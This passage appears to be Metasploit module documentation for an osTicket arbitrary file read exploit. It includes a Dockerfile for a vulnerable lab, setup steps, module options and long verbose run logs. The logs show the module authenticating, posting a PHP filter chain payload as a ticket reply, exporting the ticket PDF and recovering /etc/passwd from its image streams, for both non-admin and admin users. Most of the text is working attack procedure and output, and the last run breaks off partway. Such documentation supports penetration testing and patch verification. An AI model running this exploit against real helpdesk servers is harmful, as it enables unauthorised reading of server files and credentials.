mysql -u root -e "CREATE DATABASE IF NOT EXISTS ${DB_NAME};" && \
mysql -u root -e "CREATE USER IF NOT EXISTS '${DB_USER}'@'localhost' IDENTIFIED BY '${DB_PASS}';" && \
mysql -u root -e "GRANT ALL PRIVILEGES ON ${DB_NAME}.* TO '${DB_USER}'@'localhost';" && \
mysql -u root -e "FLUSH PRIVILEGES;"
RUN mkdir -p /tmp/osticket_install && \
wget -O /tmp/osticket_install/osticket.zip "https://github.com/osTicket/osTicket/releases/download/${OSTICKET_VER}/osTicket-${OSTICKET_VER}.zip" && \
rm -rf ${INSTALL_DIR} && \
mkdir -p ${INSTALL_DIR} && \
unzip -q /tmp/osticket_install/osticket.zip -d /tmp/osticket_install/ && \
cp -r /tmp/osticket_install/upload/* ${INSTALL_DIR}/
RUN cp ${INSTALL_DIR}/include/ost-sampleconfig.php ${INSTALL_DIR}/include/ost-config.php
RUN sed -i "s/error_reporting(E_ALL & ~E_NOTICE);/error_reporting(E_ALL \& ~E_NOTICE \& ~E_DEPRECATED \& ~E_WARNING);/" ${INSTALL_DIR}/bootstrap.php
RUN echo "<VirtualHost *:80>\n\
ServerAdmin admin@localhost\n\
DocumentRoot ${INSTALL_DIR}\n\
<Directory ${INSTALL_DIR}>\n\
Options Indexes FollowSymLinks MultiViews\n\
AllowOverride All\n\
Require all granted\n\
</Directory>\n\
ErrorLog \${APACHE_LOG_DIR}/error.log\n\
CustomLog \${APACHE_LOG_DIR}/access.log combined\n\
</VirtualHost>" > /etc/apache2/sites-available/osticket.conf
RUN a2dissite 000-default.conf && \
a2ensite osticket.conf && \
a2enmod rewrite && \
chown -R www-data:www-data ${INSTALL_DIR} && \
chmod -R 755 ${INSTALL_DIR} && \
chmod 0666 ${INSTALL_DIR}/include/ost-config.php
RUN rm -rf /tmp/osticket_install
RUN echo '#!/bin/bash\n\
# Start MariaDB service\n\
service mariadb start\n\
# Wait for DB to be fully ready\n\
sleep 2\n\
# Start Apache in the foreground to keep the container alive\n\
source /etc/apache2/envvars\n\
exec apache2 -D FOREGROUND\n\
' > /usr/local/bin/entrypoint.sh && chmod +x /usr/local/bin/entrypoint.sh
EXPOSE 80
CMD ["/usr/local/bin/entrypoint.sh"]
```
2. Build and run with the following commands:
```bash
docker build -t osticket-cve-env .
docker run -d -p 8080:80 --name osticket_vuln_server osticket-cve-env
```
2. After installation and creation of the database, one final step is required to complete osTicket installation and that must be done through the browser. Navigate to your osTicket URL (e.g., `http://localhost:8080/support`) to access the "Basic Installation" screen. You will need to fill out three main sections to finalize the setup:
**System Settings**
This section defines the basic identity of your helpdesk:
- **Helpdesk Name:** The title of your support site (e.g., "IT Support" or "Customer Helpdesk").
- **Default Email:** The primary email address from which the system will send outgoing notifications.
**Admin User**
This section creates the master administrator account for the osTicket backend:
- **First Name & Last Name:** The administrator's real name.
- **Email Address:** The administrator's email address (used for password resets and system alerts). Must be different from **Default Email** mentioned above.
- **Username:** The login username for the admin panel.
- **Password & Retype Password:** The password for the admin account.
**Database Settings**
This section connects the application to your pre-configured MySQL/MariaDB database:
- **MySQL Table Prefix:** Typically left as the default `ost_` unless you are sharing the database with other applications.
- **MySQL Hostname:** The address of your database server (usually `localhost` or `127.0.0.1` if hosted on the same machine).
- **MySQL Database:** The name of the blank database you created prior to running the installer (e.g., `osticket_db`).
- **MySQL Username:** The database user with privileges to read, write, and modify the database (e.g., `osticket_user` or a dedicated user).
- **MySQL Password:** The password for the MySQL user. We are using `P@ssw0rd123!` in the above script.
Once these fields are filled out, click **"Install Now"** to populate the database and complete the installation. *(Note: Ensure that the `include/ost-sampleconfig.php` file has been copied, renamed to `include/ost-config.php`, and has write permissions enabled before clicking install)*.
3. After installation is completed. Sign up and create a user. This user will need to verify itself using a magic link. Since we are not setting up any mail server, we have to login with the administrator user, reset their password from `/scp/users.php` to activate the user account.
4. Create a new ticket and note down the ticket number (It will have a number like: `#527686`)
## Verification Steps
1. Install OsTicket using either of the steps mentioned above.
2. Start `msfconsole`.
3. Do: `use auxiliary/gather/osticket_arbitrary_file_read`
4. Set the `RHOSTS` and `RPORT` options as necessary
5. Set the `TICKET_NUMBER` with the ticket number gathered from the website. If not set
6. Set the `USERNAME` and `PASSWORD` from the registered user.
7. Set the full file name that you want to fetch in the `FILE`.
8. Do: `run`
## Options
### FILE
The absolute file path of the target file to be retrieved from the osTicket server. By default, this is set to `/etc/passwd`.
### LOGIN_PORTAL
Specifies which osTicket portal to use for authentication. osTicket maintains separate login interfaces for staff/agents (`scp`) and end-users (`client`). Setting this to auto allows the module to automatically determine the correct portal based on the authentication flow or provided credentials.
### MAX_REDIRECTS
The maximum number of HTTP redirects the module will follow while navigating the authentication process and executing the payload. The default is `3`.
### MAX_TICKET_ID
Specifies the upper limit when brute-forcing the internal database ID of a ticket. Since the internal database ID is often required for exploitation but isn't always publicly visible, the module will attempt to brute-force it up to this boundary if `TICKET_ID` is not explicitly provided. The default is `20`.
### TICKET_NUMBER
The public-facing, user-visible ticket number (e.g., `978554`) that the module will target to inject the payload and trigger the vulnerability.
## Scenarios
### With new non-administrator user
```
msf auxiliary(gather/osticket_arbitrary_file_read) > set USERNAME test
USERNAME => test
msf auxiliary(gather/osticket_arbitrary_file_read) > set TICKET_NUMBER 527686
TICKET_NUMBER => 527686
msf auxiliary(gather/osticket_arbitrary_file_read) > set VERBOSE true
VERBOSE => true
msf auxiliary(gather/osticket_arbitrary_file_read) > set RHOSTS http://localhost:8080/
RHOSTS => http://localhost:8080/
msf auxiliary(gather/osticket_arbitrary_file_read) > set PASSWORD administrator
PASSWORD => administrator
msf auxiliary(gather/osticket_arbitrary_file_read) > run
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[*] is_osticket?: Response code=200, body length=4943
[*] is_osticket?: osTicket signature FOUND in response body
[!] The service is running, but could not be validated. Target appears to be an osTicket installation
[*] Target: 127.0.0.1:8080
[*] File to extract: /etc/passwd
[*] Attempting authentication...
[*] do_login: portal preference=auto, base_uri=/, username=test
[*] do_login: Trying staff panel (/scp/) login...
[*] osticket_login_scp: GET /scp/login.php
[*] osticket_login_scp: GET response code=200, cookies=OSTSESSID=hni5kfvm5hin0dpkvc7suh70dm;
[*] extract_csrf_token: Searching HTML (6504 bytes) for __CSRFToken__
[+] extract_csrf_token: Found token=dc50fdaa52a6f0aefa0adb14af2698ad89c95501
[*] osticket_login_scp: POST /scp/login.php with userid=test
[*] osticket_login_scp: POST response code=200, url=, body contains userid=true
[-] osticket_login_scp: Login FAILED (still see login form)
[*] do_login: Staff panel login failed
[*] do_login: Trying client portal login...
[*] osticket_login_client: GET /login.php
[*] osticket_login_client: GET response code=200, cookies=OSTSESSID=qpo6iptqv75f1cqcderpha1v86;
[*] extract_csrf_token: Searching HTML (5213 bytes) for __CSRFToken__
[+] extract_csrf_token: Found token=111e06bd5a313466a4f550f9d8014ebb8ba90e8e
[*] osticket_login_client: POST /login.php with luser=test
[*] osticket_login_client: POST response code=302, body contains luser=false
[+] osticket_login_client: Login SUCCESS
[+] do_login: Client portal login succeeded, cookies=OSTSESSID=qpo6iptqv75f1cqcderpha1v86;
[+] Authenticated via client portal
[*] Locating ticket...
[*] find_ticket_id: GET /tickets.php (looking for ticket #527686)
[*] find_ticket_id: Using cookies=OSTSESSID=qpo6iptqv75f1cqcderpha1v86;
[*] find_ticket_id: Ticket listing response code=200, body=6856 bytes
[*] find_ticket_id: Body Length:
6856
[+] find_ticket_id: Found ticket ID=2 from listing page
[+] Ticket #527686 has internal ID: 2
[*] Generating PHP filter chain payload...
[*] Payload generated (13646 bytes)
[*] Submitting payload as ticket reply...
[*] submit_ticket_reply: GET /tickets.php?id=2 to fetch CSRF token
[*] submit_ticket_reply: GET response code=200, body=9605 bytes
[*] extract_csrf_token: Searching HTML (9605 bytes) for __CSRFToken__
[+] extract_csrf_token: Found token=f9ae5cdbe887f403e26489ec4fbb2d1d27234797
[*] submit_ticket_reply: Using textarea field 'c89d7750ba2621', payload=13646 bytes
[*] submit_ticket_reply: POST /tickets.php with a=reply, id=2
[*] submit_ticket_reply: POST response code=200, body=24114 bytes
[*] submit_ticket_reply: Success indicators found=true
[+] Reply posted successfully
[*] Downloading ticket PDF...
[*] download_ticket_pdf: Trying PDF export from /tickets.php
[*] download_ticket_pdf: GET /tickets.php?a=print&id=2
[*] download_ticket_pdf: Response code=200, Content-Type=application/pdf, magic="%PDF", size=54270
[+] download_ticket_pdf: Got PDF (54270 bytes)
[+] PDF downloaded (54270 bytes)
[*] Extracting file from PDF...
[*] extract_files_from_pdf: Processing PDF (54270 bytes)
[*] extract_pdf_image_streams: Found image object (139060 bytes decompressed)
[*] extract_pdf_image_streams: Found image object (1239 bytes decompressed)
[*] extract_files_from_pdf: Found 2 image XObject streams
[*] extract_files_from_pdf: Image #0: 139060 bytes, swapped to BGR
[*] extract_files_from_pdf: Image #1: 1239 bytes, swapped to BGR
[*] extract_data_from_bmp_stream: ISO-2022-KR marker found at offset 0 in 1239-byte stream
[*] extract_data_from_bmp_stream: 1235 bytes after marker (nulls stripped)
[*] First 96 bytes of data after marker and null-strip:
[*] ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
[*] hex: 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
[*] Data looks like base64? false
[*] Treating as plain (non-base64) - preview:
[*] ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
[*] hex: 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
[+] extract_files_from_pdf: Image #1 yielded 1235 bytes of extracted data
[*] extract_files_from_pdf: Fallback - scanning 12 raw streams
[*] extract_files_from_pdf: Total extracted files: 1
[+] Extracted 1235 bytes
======================================================================
EXTRACTED FILE CONTENTS
======================================================================
--- [/etc/passwd] (1235 bytes) ---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
mysql:
[+] Saved to: /home/tintin/.msf4/loot/20260222194304_default_127.0.0.1_osticket.etc_pas_543896.bin
[+] Exploitation complete
[*] Running module against ::1
[*] Running automatic check ("set AutoCheck false" to disable)
[*] is_osticket?: Response code=200, body length=4943
[*] is_osticket?: osTicket signature FOUND in response body
[!] The service is running, but could not be validated. Target appears to be an osTicket installation
[*] Target: ::1:8080
[*] File to extract: /etc/passwd
[*] Attempting authentication...
[*] do_login: portal preference=auto, base_uri=/, username=test
[*] do_login: Trying staff panel (/scp/) login...
[*] osticket_login_scp: GET /scp/login.php
[*] osticket_login_scp: GET response code=200, cookies=OSTSESSID=s0ksargvidhkv41th0url3m1ua;
[*] extract_csrf_token: Searching HTML (6504 bytes) for __CSRFToken__
[+] extract_csrf_token: Found token=e1a5096cc2f00526a4606567f866ad8fdcf67d22
[*] osticket_login_scp: POST /scp/login.php with userid=test
[*] osticket_login_scp: POST response code=200, url=, body contains userid=true
[-] osticket_login_scp: Login FAILED (still see login form)
[*] do_login: Staff panel login failed
[*] do_login: Trying client portal login...
[*] osticket_login_client: GET /login.php
[*] osticket_login_client: GET response code=200, cookies=OSTSESSID=1ldkhkadfl2rqur16lnf4ru5od;
[*] extract_csrf_token: Searching HTML (5213 bytes) for __CSRFToken__
[+] extract_csrf_token: Found token=aa3f025a7693418fa66d8691f39bc60d28ed0791
[*] osticket_login_client: POST /login.php with luser=test
[*] osticket_login_client: POST response code=302, body contains luser=false
[+] osticket_login_client: Login SUCCESS
[+] do_login: Client portal login succeeded, cookies=OSTSESSID=1ldkhkadfl2rqur16lnf4ru5od;
[+] Authenticated via client portal
[*] Locating ticket...
[*] find_ticket_id: GET /tickets.php (looking for ticket #527686)
[*] find_ticket_id: Using cookies=OSTSESSID=1ldkhkadfl2rqur16lnf4ru5od;
[*] find_ticket_id: Ticket listing response code=200, body=6856 bytes
[*] find_ticket_id: Body Length:
6856
[+] find_ticket_id: Found ticket ID=2 from listing page
[+] Ticket #527686 has internal ID: 2
[*] Generating PHP filter chain payload...
[*] Payload generated (13646 bytes)
[*] Submitting payload as ticket reply...
[*] submit_ticket_reply: GET /tickets.php?id=2 to fetch CSRF token
[*] submit_ticket_reply: GET response code=200, body=23979 bytes
[*] extract_csrf_token: Searching HTML (23979 bytes) for __CSRFToken__
[+] extract_csrf_token: Found token=917409710733c0ab9c26758c5e4096531ded2441
[*] submit_ticket_reply: Using textarea field '70211e92acc5d1', payload=13646 bytes
[*] submit_ticket_reply: POST /tickets.php with a=reply, id=2
[*] submit_ticket_reply: POST response code=200, body=38488 bytes
[*] submit_ticket_reply: Success indicators found=true
[+] Reply posted successfully
[*] Downloading ticket PDF...
[*] download_ticket_pdf: Trying PDF export from /tickets.php
[*] download_ticket_pdf: GET /tickets.php?a=print&id=2
[*] download_ticket_pdf: Response code=200, Content-Type=application/pdf, magic="%PDF", size=54429
[+] download_ticket_pdf: Got PDF (54429 bytes)
[+] PDF downloaded (54429 bytes)
[*] Extracting file from PDF...
[*] extract_files_from_pdf: Processing PDF (54429 bytes)
[*] extract_pdf_image_streams: Found image object (139060 bytes decompressed)
[*] extract_pdf_image_streams: Found image object (1239 bytes decompressed)
[*] extract_files_from_pdf: Found 2 image XObject streams
[*] extract_files_from_pdf: Image #0: 139060 bytes, swapped to BGR
[*] extract_files_from_pdf: Image #1: 1239 bytes, swapped to BGR
[*] extract_data_from_bmp_stream: ISO-2022-KR marker found at offset 0 in 1239-byte stream
[*] extract_data_from_bmp_stream: 1235 bytes after marker (nulls stripped)
[*] First 96 bytes of data after marker and null-strip:
[*] ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
[*] hex: 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
[*] Data looks like base64? false
[*] Treating as plain (non-base64) - preview:
[*] ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
[*] hex: 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
[+] extract_files_from_pdf: Image #1 yielded 1235 bytes of extracted data
[*] extract_files_from_pdf: Fallback - scanning 12 raw streams
[*] extract_files_from_pdf: Total extracted files: 1
[+] Extracted 1235 bytes
======================================================================
EXTRACTED FILE CONTENTS
======================================================================
--- [/etc/passwd] (1235 bytes) ---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
mysql:
[+] Saved to: /home/tintin/.msf4/loot/20260222194305_default_1_osticket.etc_pas_161216.bin
[+] Exploitation complete
[*] Auxiliary module execution completed
```
### With Administrator user
```
msf auxiliary(gather/osticket_arbitrary_file_read) > set USERNAME administrator
USERNAME => administrator
msf auxiliary(gather/osticket_arbitrary_file_read) > set TICKET_NUMBER 527686
TICKET_NUMBER => 527686
msf auxiliary(gather/osticket_arbitrary_file_read) > set VERBOSE true
VERBOSE => true
msf auxiliary(gather/osticket_arbitrary_file_read) > set RHOSTS http://localhost:8080/
RHOSTS => http://localhost:8080/
msf auxiliary(gather/osticket_arbitrary_file_read) > set PASSWORD administrator
PASSWORD => administrator
msf auxiliary(gather/osticket_arbitrary_file_read) > run
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[*] is_osticket?: Response code=200, body length=4943
[*] is_osticket?: osTicket signature FOUND in response body
[!] The service is running, but could not be validated. Target appears to be an osTicket installation
[*] Target: 127.0.0.1:8080
[*] File to extract: /etc/passwd
[*] Attempting authentication...
[*] do_login: portal preference=auto, base_uri=/, username=administrator
[*] do_login: Trying staff panel (/scp/) login...
[*] osticket_login_scp: GET /scp/login.php
[*] osticket_login_scp: GET response code=200, cookies=OSTSESSID=1in45o31u3itsmsr3u5848gr83;
[*] extract_csrf_token: Searching HTML (6504 bytes) for __CSRFToken__
[+] extract_csrf_token: Found token=f467a6da2cdee133ab691be6cc479ad9909824b0
[*] osticket_login_scp: POST /scp/login.php with userid=administrator
[*] osticket_login_scp: POST response code=302, url=index.php, body contains userid=false
[+] osticket_login_scp: Login SUCCESS
[+] do_login: SCP login succeeded, cookies=OSTSESSID=1in45o31u3itsmsr3u5848gr83;
[+] Authenticated via scp portal
[*] Locating ticket...
[*] find_ticket_id: GET /scp/tickets.php (looking for ticket #527686)
[*] find_ticket_id: Using cookies=OSTSESSID=1in45o31u3itsmsr3u5848gr83;
[*] find_ticket_id: Ticket listing response code=200, body=23649 bytes
[*] find_ticket_id: Body Length:
23649
[+] find_ticket_id: Found ticket ID=1 from listing page
[+] Ticket #527686 has internal ID: 1
[*] Generating PHP filter chain payload...
[*] Payload generated (13646 bytes)
[*] Submitting payload as ticket reply...
[*] acquire_lock_code: POST /scp/ajax.php/lock/ticket/1
[+] acquire_lock_code: Got lock code from JSON response
[*] submit_ticket_reply: GET /scp/tickets.php?id=1 to fetch CSRF token
[*] submit_ticket_reply: GET response code=200, body=57517 bytes
[*] extract_csrf_token: Searching HTML (57517 bytes) for __CSRFToken__
[+] extract_csrf_token: Found token=f467a6da2cdee133ab691be6cc479ad9909824b0
[*] submit_ticket_reply: Using textarea field 'response', payload=13646 bytes
[*] submit_ticket_reply: POST /scp/tickets.php with a=reply, id=1
[*] submit_ticket_reply: POST response code=302, body=13 bytes
[+] submit_ticket_reply: Got 302 redirect - reply accepted
[+] Reply posted successfully
[*] Downloading ticket PDF...
[*] download_ticket_pdf: Trying PDF export from /scp/tickets.php
[*] download_ticket_pdf: GET /scp/tickets.php?a=print&id=1
[*] download_ticket_pdf: Response code=200, Content-Type=application/pdf, magic="%PDF", size=71895
[+] download_ticket_pdf: Got PDF (71895 bytes)
[+] PDF downloaded (71895 bytes)
[*] Extracting file from PDF...
[*] extract_files_from_pdf: Processing PDF (71895 bytes)
[*] extract_pdf_image_streams: Found image object (139060 bytes decompressed)
[*] extract_pdf_image_streams: Found image object (1239 bytes decompressed)
[*] extract_files_from_pdf: Found 2 image XObject streams
[*] extract_files_from_pdf: Image #0: 139060 bytes, swapped to BGR
[*] extract_files_from_pdf: Image #1: 1239 bytes, swapped to BGR
[*] extract_data_from_bmp_stream: ISO-2022-KR marker found at offset 0 in 1239-byte stream
[*] extract_data_from_bmp_stream: 1235 bytes after marker (nulls stripped)
[*] First 96 bytes of data after marker and null-strip:
[*] ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
[*] hex: 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
[*] Data looks like base64? false
[*] Treating as plain (non-base64) - preview:
[*] ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
[*] hex: 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
[+] extract_files_from_pdf: Image #1 yielded 1235 bytes of extracted data
[*] extract_files_from_pdf: Fallback - scanning 16 raw streams
[*] extract_files_from_pdf: Total extracted files: 1
[+] Extracted 1235 bytes
======================================================================
EXTRACTED FILE CONTENTS
======================================================================
--- [/etc/passwd] (1235 bytes) ---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
mysql:
[+] Saved to: /home/tintin/.msf4/loot/20260222194158_default_127.0.0.1_osticket.etc_pas_205832.bin
[+] Exploitation complete
[*] Running module against ::1
[*] Running automatic check ("set AutoCheck false" to disable)
[*] is_osticket?: Response code=200, body length=4943
[*] is_osticket?: osTicket signature FOUND in response body
[!] The service is running, but could not be validated. Target appears to be an osTicket installation
[*] Target: ::1:8080
[*] File to extract: /etc/passwd
[*] Attempting authentication...
[*] do_login: portal preference=auto, base_uri=/, username=administrator
[*] do_login: Trying staff panel (/scp/) login...
[*] osticket_login_scp: GET /scp/login.php
[*] osticket_login_scp: GET response code=200, cookies=OSTSESSID=qqa1df1k3ajku81n4vbkloeibq;
[*] extract_csrf_token: Searching HTML (6504 bytes) for __CSRFToken__
[+] extract_csrf_token: Found token=1ddff80315e6dcc127eb115ccf65e4307c1225aa
[*] osticket_login_scp: POST /scp/login.php with userid=administrator
[*] osticket_login_scp: POST response code=302, url=index.php, body contains userid=false
[+] osticket_login_scp: Login SUCCESS
[+] do_login: SCP login succeeded, cookies=OSTSESSID=qqa1df1k3ajku81n4vbkloeibq;
[+] Authenticated via scp portal
[*] Locating ticket...
[*] find_ticket_id: GET /scp/tickets.php (looking for ticket #527686)
[*] find_ticket_id: Using cookies=OSTSESSID=qqa1df1k3ajku81n4vbkloeibq;
[*] find_ticket_id: Ticket listing response code=200, body=23647 bytes
[*] find_ticket_id: Body Length:
23647
[+] find_ticket_id: Found ticket ID=1 from listing page
[+] Ticket #527686 has internal ID: 1
[*] Generating PHP filter chain payload...
[*] Payload generated (13646 bytes)
[*] Submitting payload as ticket reply...
[*] acquire_lock_code: POST /scp/ajax.php/lock/ticket/1
[+] acquire_lock_code: Got lock code from JSON response
[*] submit_ticket_reply: GET /scp/tickets.php?id=1 to fetch CSRF token
[*] submit_ticket_reply: GET response code=200, body=73937 bytes
[*] extract_csrf_token: Searching HTML (73937 bytes) for __CSRFToken__
[+] extract_csrf_token: Found token=1ddff80315e6dcc127eb115ccf65e4307c1225aa
[*] submit_ticket_reply: Using textarea field 'response', payload=13646 bytes
[*] submit_ticket_reply: POST /scp/tickets.php with a=reply, id=1
[*] submit_ticket_reply: POST response code=302, body=13 bytes
[+] submit_ticket_reply: Got 302 redirect - reply accepted
[+] Reply posted successfully
[*] Downloading ticket PDF...
[*] download_ticket_pdf: Trying PDF export from /scp/tickets.php
[*] download_ticket_pdf: GET /scp/tickets.php?a=print&id=1
[*] download_ticket_pdf: Response code=200, Content-Type=application/pdf, magic="%PDF", size=72070
[+] download_ticket_pdf: Got PDF (72070 bytes)
[+] PDF downloaded (72070 bytes)
[*] Extracting file from PDF...
[*] extract_files_from_pdf: Processing PDF (72070 bytes)
[*] extract_pdf_image_streams: Found image object (139060 bytes decompressed)
[*] extract_pdf_image_streams: Found image object (1239 bytes decompressed)
[*] extract_files_from_pdf: Found 2 image XObject streams
[*] extract_files_from_pdf: Image #0: 139060 bytes, swapped to BGR
[*] extract_files_from_pdf: Image #1: 1239 bytes, swapped to BGR
[*] extract_data_from_bmp_stream: ISO-2022-KR marker found at offset 0 in 1239-byte stream
[*] extract_data_from_bmp_stream: 1235 bytes after marker (nulls stripped)
[*] First 96 bytes of data after marker and null-strip:
[*] ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
